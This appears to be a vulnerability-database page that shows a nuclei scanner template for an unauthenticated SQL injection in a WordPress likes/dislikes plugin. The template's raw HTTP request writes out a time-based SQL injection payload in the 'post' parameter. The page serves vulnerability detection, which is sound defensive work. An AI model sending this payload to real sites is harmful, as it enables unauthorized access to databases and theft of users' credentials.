Lucene search
K

Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Likes and Dislikes Plugin <= 1.0.0 has SQL Injection vulnerability allowing sensitive data extraction.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-5287
16 Jun 202522:25
githubexploit
GithubExploit
Exploit for CVE-2025-5287
12 Jun 202508:34
githubexploit
GithubExploit
Exploit for CVE-2025-5287
31 May 202511:22
githubexploit
Circl
CVE-2025-5287
28 May 202513:47
circl
CNNVD
WordPress plugin Likes and Dislikes Plugin SQL注入漏洞
28 May 202500:00
cnnvd
CVE
CVE-2025-5287
28 May 202508:22
cve
Cvelist
CVE-2025-5287 Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
28 May 202508:22
cvelist
NVD
CVE-2025-5287
28 May 202509:15
nvd
Packet Storm
📄 WordPress Likes and Dislikes 1.0.0 SQL Injection
12 Jun 202500:00
packetstorm
Packet Storm News
WordPress Likes and Dislikes 1.0.0 SQL Injection
28 May 202500:00
packetstormnews
Rows per page
id: CVE-2025-5287

info:
  name: Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
  author: CodeStuffBreakThings
  severity: high
  description: |
    The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can extract sensitive database information including passwords and email addresses through SQL injection in the post parameter.
  remediation: No known patch at this time. Consider removing or disabling the plugin until a patch is released.
  reference:
    - https://plugins.trac.wordpress.org/browser/inprosysmedia-likes-dislikes-post/trunk/inprosysmedia-likes-dislikes-post.php#L76
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ad19205d-d355-45d8-be5b-f8005459a8c7?source=cve
    - https://github.com/XiaomingX/data-cve-poc/blob/main/2025/CVE-2025-5287/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-5287
    cwe-id: CWE-89
    epss-score: 0.02101
    epss-percentile: 0.7946
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/posts-like-dislike/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,posts-like-dislike,time-based-sqli,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(6)))a)&state=like

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains_all(body, "like","dislike")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502200b32ec3f56fb25f13dc46b72e55459ae7920b554476c728a243c49b0c159cd5802210098af3efb7cfa7a57386df3ccdb0566fb878dc702c8fd31220cfe13bc41ef04cc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.02101
SSVC
21